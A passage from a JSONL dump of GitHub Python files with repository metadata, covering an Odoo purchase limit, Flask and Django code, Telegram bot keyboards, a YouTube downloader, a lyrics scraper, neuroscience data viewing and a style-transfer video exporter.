dates_range[sel.limit_purchase_range]['init']\n date_end = dates_range[sel.limit_purchase_range]['end']\n else:\n date_init = fields.Date.from_string(\n sel.date_range_init)\n date_end = fields.Date.from_string(\n sel.date_range_end)\n domain = [\n ('partner_id', 'child_of', sel.name.id),\n ('state', 'in', ('open', 'paid')),\n ('date_invoice', '>=', fields.Date.to_string(date_init)),\n ('date_invoice', '<=', fields.Date.to_string(date_end))\n ]\n if sel.company_id:\n domain.append(\n ('company_id', '=', sel.company_id.id)\n )\n in_invoice_lines = self.env['account.invoice'].search(\n domain + [('type', '=', 'in_invoice')]\n ).mapped('invoice_line_ids')\n out_invoice_lines = self.env['account.invoice'].search(\n domain + [('type', '=', 'in_refund')]\n ).mapped('invoice_line_ids')\n in_qty_total = 0.0\n out_qty_total = 0.0\n if sel.product_id: # Variants\n in_qty_total =\\\n sum(in_invoice_lines.filtered(\n lambda x: x.product_id.id == sel.product_id.id\n ).mapped('quantity'))\n out_qty_total =\\\n sum(out_invoice_lines.filtered(\n lambda x: x.product_id.id == sel.product_id.id\n ).mapped('quantity'))\n else: # Template\n in_qty_total =\\\n sum(in_invoice_lines.filtered(\n lambda x: x.product_id.product_tmpl_id.id ==\n sel.product_tmpl_id.id\n ).mapped('quantity'))\n out_qty_total =\\\n sum(out_invoice_lines.filtered(\n lambda x: x.product_id.product_tmpl_id.id ==\n sel.product_tmpl_id.id\n ).mapped('quantity'))\n sel.limit_purchase_actual = in_qty_total - out_qty_total\n","repo_name":"QubiQ/qu-purchase-workflow","sub_path":"limit_stock_purchase_by_supplier/models/product_supplierinfo.py","file_name":"product_supplierinfo.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33207047732","text":"#1000 + 70 * x < c * x\n#a < (c-b) * x\n#x > a / (c-b)\n\nimport math\n\na, b, c = map(int, input().split(' '))\n\nif b >= c:\n print(-1)\nelse:\n x = a / (c - b)\n\n if math.ceil(x) == x:\n print(int(math.ceil(x)) + 1)\n else:\n print(math.ceil(x))\n","repo_name":"dskym/Algorithm","sub_path":"ACMICPC/1712.py","file_name":"1712.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70417149266","text":"#!/usr/bin/env python3\nimport sys\nimport os\nPACKAGE_PARENT = '..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom model.record import record, read\n\napp = Flask(__name__)\nCORS(app)\n\n##### ********* DHT11 ******** ####\n@app.route('/Record/', methods=['POST'])\ndef record_controller():\n return record(request)\n\n@app.route('/Read/', methods=['GET'])\ndef read_controller(id_rp):\n id_sensor = request.args.get('id_sensor', '')\n return read(id_rp, id_sensor)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5002)","repo_name":"josgarcam/RP_sensor","sub_path":"API/controller/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72981960787","text":"from aiogram.utils.keyboard import InlineKeyboardButton, InlineKeyboardBuilder, InlineKeyboardMarkup\nfrom aiogram.filters.callback_data import CallbackData\n\nFORM_ORDER = \"Перейти к оформлению\"\n\nBACK_TO_CART = '🔙 Вернуться в корзину'\nBACK_TO_CITY = '🔙 Вернуться к выбору города'\nBACK_TO_ADDRESS = '🔙 Вернуться к заполнению адр��са'\nBACK_TO_NAME = '🔙 Вернуться к заполнению имени'\nBACK_TO_PHONE = '🔙 Вернуться к заполнению телефона'\nCANCEL_ORDER = '🛑 Отменить оформление заказа'\nACCORD_ORDER = '✅ Подтвердить'\nPAY = 'Оплатить'\n\n\nclass CancelCallbackFactory(CallbackData, prefix='cancel', sep='_'):\n back_to: str\n\n\nbuttons = {\n 'cart': InlineKeyboardButton(\n text=BACK_TO_CART, callback_data=CancelCallbackFactory(back_to='cart').pack()\n ),\n 'city': InlineKeyboardButton(\n text=BACK_TO_CITY, callback_data=CancelCallbackFactory(back_to='city').pack()\n ),\n 'address': InlineKeyboardButton(\n text=BACK_TO_ADDRESS, callback_data=CancelCallbackFactory(back_to='address').pack()\n ),\n 'name': InlineKeyboardButton(\n text=BACK_TO_NAME, callback_data=CancelCallbackFactory(back_to='name').pack()\n ),\n 'phone': InlineKeyboardButton(\n text=BACK_TO_PHONE, callback_data=CancelCallbackFactory(back_to='phone').pack()\n ),\n 'exit': InlineKeyboardButton(\n text=CANCEL_ORDER, callback_data=CancelCallbackFactory(back_to='exit').pack()\n ),\n}\n\n\ndef create_order_keyboard() -> InlineKeyboardMarkup:\n kb = InlineKeyboardBuilder()\n button = InlineKeyboardButton(text=FORM_ORDER, callback_data='order')\n kb.add(button)\n return kb.as_markup()\n\n\ndef create_cities_keyboard(cities: list) -> InlineKeyboardMarkup:\n kb = InlineKeyboardBuilder()\n kb.row(\n *[\n InlineKeyboardButton(text=city['name'],\n callback_data=f'city:{city[\"id\"]}:{city[\"name\"]}') for\n city in cities\n ],\n width=2\n )\n kb.row(buttons['cart'], width=1)\n kb.row(buttons['exit'], width=1)\n return kb.as_markup()\n\n\ndef create_cancel_keyboard(back_to: str) -> InlineKeyboardMarkup:\n kb = InlineKeyboardBuilder()\n kb.row(buttons[back_to], width=1)\n kb.row(buttons['exit'], width=1)\n return kb.as_markup()\n\n\ndef create_accord_keyboard() -> InlineKeyboardMarkup:\n kb = InlineKeyboardBuilder()\n kb.row(InlineKeyboardButton(text=ACCORD_ORDER, callback_data='accord'))\n kb.row(buttons['phone'], width=1)\n kb.row(buttons['exit'], width=1)\n return kb.as_markup()\n","repo_name":"Ponimon4ik/telegram_shop","sub_path":"app/bot/shop/core/keyboards/order_keyboard.py","file_name":"order_keyboard.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4130076457","text":"import math\nclass Controller:\n def rotate_point(self, x, y, angle):\n angle_rad = math.radians(angle)\n cos_theta = math.cos(angle_rad)\n sin_theta = math.sin(angle_rad)\n x_rot = (x * cos_theta) - (y * sin_theta)\n y_rot = (x * sin_theta) + (y * cos_theta)\n return x_rot, y_rot\n\n def calculate_vertices(self, center_x, center_y, length, width, angle):\n half_length = length / 2\n half_width = width / 2\n\n # Calculate the four corners of the rectangle\n top_left = self.rotate_point(-half_length, half_width, angle)\n top_right = self.rotate_point(half_length, half_width, angle)\n bottom_left = self.rotate_point(-half_length, -half_width, angle)\n bottom_right = self.rotate_point(half_length, -half_width, angle)\n\n # Translate the rotated points to the center coordinates\n top_left = (top_left[0] + center_x, top_left[1] + center_y)\n top_right = (top_right[0] + center_x, top_right[1] + center_y)\n bottom_left = (bottom_left[0] + center_x, bottom_left[1] + center_y)\n bottom_right = (bottom_right[0] + center_x, bottom_right[1] + center_y)\n\n return top_left, top_right, bottom_left, bottom_right\n\n def is_inside_rectangle(point, vertices):\n # Find the minimum and maximum x and y coordinates of the rectangle\n min_x = min(vertex[0] for vertex in vertices)\n max_x = max(vertex[0] for vertex in vertices)\n min_y = min(vertex[1] for vertex in vertices)\n max_y = max(vertex[1] for vertex in vertices)\n\n # Check if the given point is inside the rectangle\n if min_x <= point[0] <= max_x and min_y <= point[1] <= max_y:\n return True\n else:\n return False\n\n def check_rectangle_crossing(self, center1_x, center1_y, length1, width1, angle1,\n center2_x, center2_y, length2, width2, angle2):\n # Calculate the four vertices for each rectangle\n vertices1 = self.calculate_vertices(center1_x, center1_y, length1, width1, angle1)\n vertices2 = self.calculate_vertices(center2_x, center2_y, length2, width2, angle2)\n\n # Check for intersection\n for vertex in vertices1:\n if self.is_inside_rectangle(vertex, vertices2):\n return True\n\n for vertex in vertices2:\n if self.is_inside_rectangle(vertex, vertices1):\n return True\n\n return False\n\n\n\n # Same as the previous code block\n\n\n\n # # Example usage:\n # center1_x, center1_y = 0, 0\n # length1, width1 = 4, 2\n # angle1 = 0\n #\n # center2_x, center2_y = 3, 0\n # length2, width2 = 4, 2\n # angle2 = 30\n #\n # crossing = check_rectangle_crossing(center1_x, center1_y, length1, width1, angle1,\n # center2_x, center2_y, length2, width2, angle2)\n #\n # if crossing:\n # print(\"Rectangles are crossing.\")\n # else:\n # print(\"Rectangles are not crossing.\")","repo_name":"IvanTheDumbestProgrammer/ControlSys","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27532369130","text":"import collections\n\nclass ManyToManyTranslator(object):\n \"\"\"\n self.transl (dict): {frozenset a} -> {frozenset b}\n self.reverse_transl (dict): {frozenset b} -> {frozenset a}\n \"\"\"\n \n def __init__(self, input_name, output_name,\n name='Unnamed ManyToManyTranslater object'):\n \n self.input_name = input_name\n self.output_name = output_name\n self.name = name\n #self.max_orthologs = max_orthologs\n self.transl = {}\n self.reverse_transl = {}\n\n def reverse(self):\n (self.input_name, self.output_name) = (self.output_name, self.input_name)\n self.transl = self.reverse_transl\n self.reverse_transl = self.transl\n \n def define_mappings_from_one_to_one_list(\n self, list_of_paired_ids):\n \n for (seta, setb) in list_of_paired_ids:\n self.transl[frozenset([seta])] = frozenset([setb])\n self.reverse_transl[frozenset([setb])] = frozenset([seta])\n\n def define_mappings_from_list_of_paired_sets(\n self, list_of_paired_sets,\n max_orthologs=5):\n \n for (seta, setb) in list_of_paired_sets:\n if (len(seta)>max_orthologs) or (len(setb)>max_orthologs):\n continue\n self.transl[frozenset(seta)] = frozenset(setb)\n self.reverse_transl[frozenset(setb)] = frozenset(seta)\n \n def combine_list_of_sets_based_on_homology(self, _list, reverse_transl=False):\n \n if reverse_transl:\n groupings = list(self.reverse_transl.keys())\n else:\n groupings = list(self.transl.keys())\n \n print('combine_list_of_sets_based_on_homology():')\n \n expanded = self.expand_list_of_sets_to_include_all_in_group(\n _list, groupings)\n \n print('Expanded input list of {0} items (=output length {1}).'.format(\n len(_list), len(expanded)))\n \n collapsed = list(set(expanded))#self.collapse_list_of_sets(expanded)\n print(\"Collapsed a list of sets to length {0}.\".format(len(collapsed)))\n return collapsed\n \n @staticmethod\n def expand_list_of_sets_to_include_all_in_group(_t, groupings):\n expanded = [set() for x in _t]\n \n for n, _a in enumerate(_t):\n \n for _b in groupings:\n \n if _a & _b:\n expanded[n] |= _b\n \n for n in range(len(expanded)):\n expanded[n] = frozenset(expanded[n])\n \n return expanded\n \n @staticmethod\n def collapse_list_of_sets(_t):\n print(\"Collapsing a list of sets of length {0}\".format(len(_t)))\n collapsed = []\n \n def remove_a_row(_list):\n for n1, _a in enumerate(_t):\n for n2, _b in enumerate(_t[n1+1:]):\n if _a & _b:\n return (True, n1, n2)\n return (False, -1, -1)\n \n has_overlaps = True\n \n while has_overlaps:\n has_overlaps, n1, n2 = remove_a_row(_t)\n if has_overlaps:\n _t[n1] |= _t[n2]\n del _t[n2]\n \n print(\"Collapsed a list of sets to length {0}.\".format(len(_t)))\n return _t\n \n @classmethod\n def collapse_list_of_paired_sets(cls, _t, verbose=False):\n \n print(\"Collapsing a list of paired sets, length {0}.\".format(len(_t)))\n \n done_collapsing = False\n iterations = 1\n while not done_collapsing:\n print(\"On iteration {0}.\".format(iterations))\n done_collapsing, _t = cls.run_through_to_collapse(_t, verbose=verbose)\n iterations += 1\n print(\"Fully collapsed.\")\n return _t\n \n @staticmethod\n def run_through_to_collapse(_t, verbose=False):\n \n fully_collapsed = True\n collapsed = []\n \n all_a_items, all_b_items = (set(), set()) \n \n updated_rows = collections.defaultdict(int) # For QC.\n \n for (_a, _b) in _t:\n \n if (_a & all_a_items) or (_b & all_b_items):\n \n hits = []\n \n for n, _row in enumerate(collapsed):\n if (_a & collapsed[n][0]) or (_b & collapsed[n][1]):\n collapsed[n][0] |= _a\n collapsed[n][1] |= _b\n hits.append(collapsed[n])\n \n if len(hits) != 1:\n fully_collapsed = False\n #print(\"error for row {0}\".format([_a, _b]))\n #print(\"{0} hits\".format(len(hits)))\n \n else:\n collapsed.append([_a, _b])\n \n all_a_items |= _a\n all_b_items |= _b\n \n # The following is all quality control.\n print(\"Collapsed to length {0}\".format(len(collapsed)))\n print(\"There were {0} unique items in the first position, and {1} in the second.\".format(\n len(all_a_items), len(all_b_items)))\n \n collapsed_a_items = set()\n collapsed_b_items = set()\n for (_a, _b) in _t:\n collapsed_a_items |= _a\n collapsed_b_items |= _b\n \n print(\"After collapse, there were {0} and {1} items. (Should be the same.)\".format(\n len(collapsed_a_items), len(collapsed_b_items)))\n \n lost_a = all_a_items - collapsed_a_items\n lost_b = all_b_items - collapsed_b_items\n \n if len(lost_a):\n print(\"Erroneously lost the following from A:\".format(lost_a))\n if len(lost_b):\n print(\"Erroneously lost the following from B:\".format(lost_b)) \n\n return fully_collapsed, collapsed\n \n def translate_list(self, _list, **kwargs):\n \n if 'verbose' in kwargs and (kwargs['verbose']):\n if ('reverse' not in kwargs) or (not kwargs['reverse']):\n print(\"Translating list of length {0} from {1} to {2}\".format(\n len(_list), self.input_name, self.output_name))\n else:\n print(\"Translating list of length {0} from {1} to {2}\".format(\n len(_list), self.output_name, self.input_name))\n \n output = []\n for n, item in enumerate(_list, start=1):\n \n output.append(self.translate(item, **kwargs))\n if not (n % 200):\n print(\"Translated item {0} ({1}) to {2}\".format(n, item, output[-1]))\n \n return output\n \n def translate(\n self, input_id, verbose=False, reverse=False,\n multiple_homologs_in_native_language_possible=True,\n return_str=False):\n \n # input_id is frozenset\n if type(input_id) == type(''):\n input_id = frozenset([input_id])\n \n if verbose:\n print('looking for ', input_id)\n \n translates_to = set()\n if not reverse:\n \n if multiple_homologs_in_native_language_possible:\n for k in self.transl:\n if len(k & input_id) > 0:\n translates_to |= self.transl[k]\n else:\n translates_to = self.transl[input_id]\n \n else:\n for k in self.reverse_transl:\n if len(k & input_id) > 0:\n translates_to |= self.reverse_transl[k]\n \n if return_str:\n _list = list(translates_to)\n \n if len(_list) == 1:\n return str(_list[0])\n \n elif len(_list) == 0:\n \n if len(list(input_id)) == 1:\n return str(list(input_id)[0])\n else:\n return str(input_id)\n \n else:\n return str(translates_to)\n \n return translates_to","repo_name":"dfporter/FBF_gendered_gl","sub_path":"orthos/simple/ManyToManyTranslator.py","file_name":"ManyToManyTranslator.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34794844440","text":"\n\nfrom django.contrib import admin\nfrom app.forms import ConfigurationAdminForm, OrderAdminForm, ProductAdminForm, PropertyAdminForm\nfrom .models import *\n\nclass ImageInline(admin.TabularInline):\n model = Image\n extra = 3\nclass BannerImageInline(admin.TabularInline):\n model = BannerImage\n extra = 3\nclass InfoInline(admin.TabularInline):\n model = ProductInformation\n extra = 1\nclass OrderItemInline(admin.TabularInline):\n model = OrderItem\n extra = 0\nclass ConfigurationAdmin(admin.ModelAdmin):\n list_display=('id','website_name')\n form = ConfigurationAdminForm\nclass CategoryAdmin(admin.ModelAdmin):\n list_display=('id','name')\n exclude = ('slug',)\nclass TagAdmin(admin.ModelAdmin):\n display=('name')\n exclude = ('slug',)\nclass CurrencyAdmin(admin.ModelAdmin):\n list_display=('code','symbol')\nclass ProductAdmin(admin.ModelAdmin):\n list_display=('id','name','price','old_price')\n readonly_fields = ['img_preview']\n form = ProductAdminForm\n exclude = ('slug',)\n inlines = [ImageInline,InfoInline]\nclass ProductReviewAdmin(admin.ModelAdmin):\n list_display=('id','title','product','name')\n\nclass PropertyAdmin(admin.ModelAdmin):\n list_display=('id','name','value','type')\n form = PropertyAdminForm\nclass OrderAdmin(admin.ModelAdmin):\n list_display=('id','name','phone','total_price','complete')\n form = OrderAdminForm\n inlines = [OrderItemInline]\nclass CustomerAdmin(admin.ModelAdmin):\n list_display=('id','name','email','phone')\nclass BannerAdmin(admin.ModelAdmin):\n list_display=('id','title','description','tag')\n inlines = [BannerImageInline,]\nadmin.site.register(Configuration,ConfigurationAdmin)\nadmin.site.register(Category,CategoryAdmin)\nadmin.site.register(Property,PropertyAdmin)\nadmin.site.register(PropertyType)\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(ProductReview, ProductReviewAdmin)\nadmin.site.register(Tag, TagAdmin)\nadmin.site.register(Currency,CurrencyAdmin)\nadmin.site.register(Order,OrderAdmin)\nadmin.site.register(Customer,CustomerAdmin)\nadmin.site.register(Banner,BannerAdmin)\n","repo_name":"hicach99/store","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35511667634","text":"from tkinter import *\r\nfrom pytube import YouTube\r\nfrom os import getcwd,mkdir,chdir\r\nroot=Tk()\r\nroot.geometry('900x500')\r\nroot.resizable(0,0)\r\nroot.title(\"sms youtube video downloader\")\r\nlabel=Label(root,text=\"YouTube video downloader\",bg=\"black\",fg=\"green\",font=\"Helvetika 40 bold\",pady=30)\r\nlabel.pack(fill=X)\r\nf1=Frame(root,bg='black',height=900,width=900)\r\nf1.pack()\r\nLabel(f1,text=\"paste a link below :\",font=\"Helvetika 20 bold\",bg=\"black\",fg=\"white\").place(x=320,y=20)\r\nlink=StringVar()\r\nlinkentry=Entry(f1,width=50,textvariable=link,fg=\"maroon4\",font=\"helvetika 10 bold\",bd=5).place(x=265,y=80)\r\ndef downloader():\r\n try:\r\n url=YouTube(str(link.get())) \r\n video=url.streams.first() \r\n try:\r\n mkdir(\"sms youtube downloader\") \r\n except FileExistsError:\r\n pass\r\n #video.download()\r\n t=getcwd()+\"\\sms youtube downloader\" \r\n chdir(t)\r\n video.download()\r\n path=getcwd() \r\n text=\"your video is downloaded in.....\"+path\r\n Label(f1,text=\"DOWNLOAD COMPLETED...\",font=\" Helvetika 20 bold\",bg=\"black\",fg=\"VioletRed4\").place(x=300,y=230)\r\n Label(f1,text=text,bg=\"black\",fg=\"white\",font=\"helvetika 10 bold\").place(x=0,y=320)\r\n except :\r\n Label(f1,text=\"first paste a link..\",font=\"Helvetika 15 bold\",bg=\"black\",fg=\"VioletRed4\").place(x=300,y=230)\r\n\r\nButton(f1,text=\"Download\",font=\"Helvetika 18 bold\",bg=\"blue4\",fg=\"white\",command=downloader).place(x=380,y=150)\r\nroot.mainloop()\r\n","repo_name":"ShwetaKale1708/Python","sub_path":"Youtube Video Downloader/[Source code]sms.py","file_name":"[Source code]sms.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37654384446","text":"#-*- coding: UTF-8 -*-\nimport sys\nimport re\nimport json\nimport requests\nfrom urllib.error import HTTPError\nimport urllib.parse\nfrom html.parser import HTMLParser\nimport xbmc\nimport xbmcaddon\nfrom lib.utils import *\n\n__title__ = 'lyricwiki'\n__priority__ = '200'\n__lrc__ = False\n\nLIC_TXT = 'we are not licensed to display the full lyrics for this song at the moment'\n\n\nclass LyricsFetcher:\n def __init__(self, *args, **kwargs):\n self.DEBUG = kwargs['debug']\n self.settings = kwargs['settings']\n self.url = 'http://lyrics.wikia.com/api.php?func=getSong&artist=%s&song=%s&fmt=realjson'\n\n def get_lyrics(self, song):\n log('%s: searching lyrics for %s - %s' % (__title__, song.artist, song.title), debug=self.DEBUG)\n lyrics = Lyrics(settings=self.settings)\n lyrics.song = song\n lyrics.source = __title__\n lyrics.lrc = __lrc__\n try:\n req = requests.get(self.url % (urllib.parse.quote(song.artist), urllib.parse.quote(song.title)), timeout=10)\n response = req.text\n except:\n return None\n data = json.loads(response)\n try:\n self.page = data['url']\n except:\n return None\n if not self.page.endswith('action=edit'):\n log('%s: search url: %s' % (__title__, self.page), debug=self.DEBUG)\n try:\n req = requests.get(self.page, timeout=10)\n response = req.text\n except requests.exceptions.HTTPError as error: # strange... sometimes lyrics are returned with a 404 error\n if error.response.status_code == 404:\n response = error.response.text\n else:\n return None\n except:\n return None\n matchcode = re.search(\"class='lyricbox'>(.*?)', '\\n')\n lyr = re.sub('<[^<]+?>', '', lyricstext)\n if LIC_TXT in lyr:\n return None\n lyrics.lyrics = lyr\n return lyrics\n except:\n return None\n else:\n return None\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/script.cu.lrclyrics/lib/broken-scrapers/lyricwiki/lyricsScraper.py","file_name":"lyricsScraper.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"29424286407","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport h5py\nimport torch\n\nimport logging\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom omegaconf import OmegaConf\n\nfrom context_general_bci.contexts import context_registry\nfrom context_general_bci.config import DatasetConfig, DataKey, MetaKey\nfrom context_general_bci.dataset import SpikingDataset\nfrom context_general_bci.tasks import ExperimentalTask\n\nfrom context_general_bci.analyze_utils import prep_plt, wandb_query_latest, load_wandb_run\n\nmode = 'rtt'\nmode = 'pitt'\nif mode == 'rtt':\n ctxs = context_registry.query(task=ExperimentalTask.odoherty_rtt)\nelse:\n ctxs = context_registry.query(task=ExperimentalTask.observation)\n\ncontext = ctxs[0]\n# context = context_registry.query(alias='mc_rtt')\nprint(context)\n# datapath = './data/odoherty_rtt/indy_20160407_02.mat'\n# context = context_registry.query_by_datapath(datapath)\n\nsample_query = 'human_test' # just pull the latest run\n# sample_query = 'pt_parity'\n\nwandb_run = wandb_query_latest(sample_query, exact=False, allow_running=True)[0]\n# print(wandb_run)\n_, cfg, _ = load_wandb_run(wandb_run, tag='val_loss')\ndefault_cfg = cfg.dataset\n# default_cfg: DatasetConfig = OmegaConf.create(DatasetConfig())\n# default_cfg.data_keys = [DataKey.spikes]\ndefault_cfg.data_keys = [DataKey.spikes, DataKey.bhvr_vel]\ndefault_cfg.bin_size_ms = 20\n# default_cfg.datasets = [context.alias]\ndefault_cfg.max_arrays = min(max(1, len(context.array)), 2)\n# default_cfg.max_channels = 250\ndataset = SpikingDataset(default_cfg)\ndataset.build_context_index()\ndataset.subset_split()\n\n# import torch\n# lengths = []\n# for t in range(1000):\n# lengths.append(dataset[t][DataKey.spikes].size(0))\n# print(torch.tensor(lengths).max(), torch.tensor(lengths).min())\nprint(len(dataset))\n#%%\n# trial = 0\ntrial = 10\n# trial = 30\n# trial = 10\ntrial_vel = dataset[trial][DataKey.bhvr_vel]\n\n# Show kinematic trace by integrating trial_vel\nprint(trial_vel.shape)\ntrial_pos = trial_vel.cumsum(0)\ntrial_pos = trial_pos - trial_pos[0]\n# # Plot\nfig, ax = plt.subplots(2, 1, sharex=True)\nax[0].plot(trial_vel)\nax[0].set_title('Velocity')\nax[1].plot(trial_pos)\nax[1].set_title('Position')\n\n#%%\n# iterate through trials and print min and max bhvr_vel\nmin_vel = 0\nmax_vel = 0\nfor trial in range(len(dataset)):\n trial_vel = dataset[trial][DataKey.bhvr_vel]\n min_vel = min(min_vel, trial_vel.min())\n max_vel = max(max_vel, trial_vel.max())\nprint(min_vel, max_vel)\n\n#%%\ntrial = 10\ntrial = 26\n\npop_spikes = dataset[trial][DataKey.spikes]\npop_spikes = pop_spikes[..., 0]\n# print diagnostics\n# print(pop_spikes[::2].sum(0))\n# print(pop_spikes[1::2].sum(0))\n# sns.histplot(pop_spikes[::2].sum(0))\n# sns.histplot(pop_spikes[1::2].sum(0) - pop_spikes[0::2].sum(0))\nprint(\n f\"Mean: {pop_spikes.float().mean():.2f}, \\n\"\n f\"Std: {pop_spikes.float().std():.2f}, \\n\"\n f\"Max: {pop_spikes.max():.2f}, \\n\"\n f\"Min: {pop_spikes.min():.2f}, \\n\"\n f\"Shape: {pop_spikes.shape}\"\n)\n\npop_spikes = pop_spikes.flatten(1, 2)\n# pop_spikes = pop_spikes[:, :96]\n# wait... 250?\n# path_to_old = './data/old_nlb/mc_maze.h5'\n# with h5py.File(path_to_old, 'r') as f:\n# print(f.keys())\n# pop_spikes = f['train_data_heldin']\n# pop_spikes = torch.tensor(pop_spikes)\n# print(pop_spikes.shape)\n# pop_spikes = pop_spikes[trial]\n\nprint(pop_spikes.shape)\n# print(pop_spikes.sum(0) / 0.6)\n# print(pop_spikes.sum(0))\n# Build raster scatter plot of pop_spikes\ndef plot_spikes(spikes, ax=None, vert_space=1):\n\n if ax is None:\n fig, ax = plt.subplots()\n ax = prep_plt(ax)\n sns.despine(ax=ax, left=True, bottom=False)\n spike_t, spike_c = np.where(spikes)\n # prep_plt(axes[_c], big=True)\n time = np.arange(spikes.shape[0])\n ax.scatter(\n time[spike_t], spike_c * vert_space,\n # c=colors,\n marker='|',\n s=10,\n alpha=0.9\n # alpha=0.3\n )\n time_lim = spikes.shape[0] * dataset.cfg.bin_size_ms\n ax.set_xticks(np.linspace(0, spikes.shape[0], 5))\n ax.set_xticklabels(np.linspace(0, time_lim, 5))\n # ax.set_title(\"Benchmark Maze (Sorted)\")\n ax.set_title(context.alias)\n ax.set_xlabel('Time (ms)')\n ax.set_yticks([])\n return ax\nplot_spikes(pop_spikes)\n","repo_name":"joel99/context_general_bci","sub_path":"scripts/proc_data_viewer_kinematics.py","file_name":"proc_data_viewer_kinematics.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31560299810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: bow\nExtracting Company Ticker Symbols Part 1\nFind the first record in the table and print\n\"\"\"\n\nimport requests\n\nurl = \"http://finance.yahoo.com/quote/AAPL?p=AAPL\"\nwikiURL = \"https://en.wikipedia.org/wiki/List_of_S%26P_500_companies\"\nresponse = requests.get(url)\n\nwikiResponse = requests.get(wikiURL)\n\ndata = {\"Company\":[]}\n\nwikiFirstParse = wikiResponse.text.split(\"0001555280\")[0] #view a portion of the table\nwikiDataTable = wikiFirstParse.split(\"Component Stocks\")[3] #define the top of the dataset, narrow down range\n\nprint(wikiDataTable.split(\"href=\")[5].split('\">')[1].split(\"9->13\nIndicators = {\"Previous Close\":[],\n \"Open\":[],\n \"Bid\":[],\n \"Ask\":[],\n \"DAYS_RANGE-value\":[],\n \"52 Week Range\":[],\n \"Volume\":[],\n \"Avg. Volume\":[],\n \"Market Cap\":[],\n \"Beta\":[],\n \"PE Ratio (TTM)\":[],\n \"EPS (TTM)\":[],\n \"Earnings Date\":[],\n \"Dividend & Yield\":[],\n \"Ex-Dividend Date\":[],\n \"1y Target Est\":[]}\nprint(response)\nprint(response.status_code)\n\nhtmlText = response.text\n#exception add print\n#print(htmlText)\nfor indicator in Indicators:\n #exceptin add break\n #break\n print(indicator)\n splitList = htmlText.split(indicator)\n afterFirstSplit = splitList[1].split(\" -->\")[1]\n afterSecondSplit = afterFirstSplit.split(\"\",isFull)\n\n#3取出队列队列中消息的个数\n##quese.qsize 当前消息的个数\nprint(\"当前消息的个数:\",queue.qsize())\n\n##2判断是否已空\n##queue.empty 判断队列是否为空 为空True 不为空 False\nis_Empty = queue.empty()\nprint(\"is_empty----------->\",is_Empty)","repo_name":"jiangfeng123/pygame","sub_path":"LINUX系统/linux实战/7.0/07--队列的判断.py","file_name":"07--队列的判断.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23923997751","text":"\n\nimport os\nimport torch\nfrom torchvision import transforms\nfrom inference.Inferencer import Inferencer\nfrom models.PasticheModel import PasticheModel\nfrom PIL import Image\nfrom glob import glob\nimport numpy as np\nimport cv2\n\ndef pil2cv(image):\n new_image = np.array(image, dtype=np.uint8)\n if new_image.ndim == 2:\n pass\n elif new_image.shape[2] == 3:\n new_image = cv2.cvtColor(new_image, cv2.COLOR_RGB2BGR)\n elif new_image.shape[2] == 4:\n new_image = cv2.cvtColor(new_image, cv2.COLOR_RGBA2BGRA)\n return new_image\n\n\ndef export_as_video(inference, path_img, content1, content2, path_video, total_frames, CLIP_FPS):\n\n #imgname = \"sample.jpg\"\n #content1, content2 = 0, 3\n #filepath = 'test.mp4'\n #CLIP_FPS = 30.0\n #total_frames = 100\n\n im = Image.open(path_img).convert('RGB')\n w, h = im.size\n codec = cv2.VideoWriter_fourcc(*'mp4v')\n video = cv2.VideoWriter(path_video, codec, CLIP_FPS, (w, h))\n\n for loop in range(total_frames):\n\n #PIL image\n #First Style (0-15)\n #Second Style (0-15)\n #Percentage mixture between the two styles (0.0-1.0)\n img_trans = inference.eval_image(im, content1, content2, loop / float(total_frames))\n\n video.write(pil2cv(img_trans))\n\n video.release()\n\n\ndef main(args):\n\n styles_dir = args.styles_dir\n model_dir=args.model_dir\n image_size = args.imsize\n path_image = args.path_image\n content1 = args.content1\n content2 = args.content2\n video_name = args.path_video\n total_frames = args.total_frames\n CLIP_FPS = 30.0\n loop = 2\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n #num_styles = 16\n #\n \n style_images_dir = glob(os.path.join(styles_dir, '*.jpg'))\n num_styles = len(style_images_dir)\n\n model_save_dir = model_dir + \"/pastichemodel_\"+str(loop)+\"-FINAL.pth\"\n pastichemodel = PasticheModel(num_styles)\n inference = Inferencer(pastichemodel, device, image_size)\n inference.load_model_weights(model_save_dir)\n\n\n export_as_video(inference, path_image, content1, content2, video_name, total_frames, 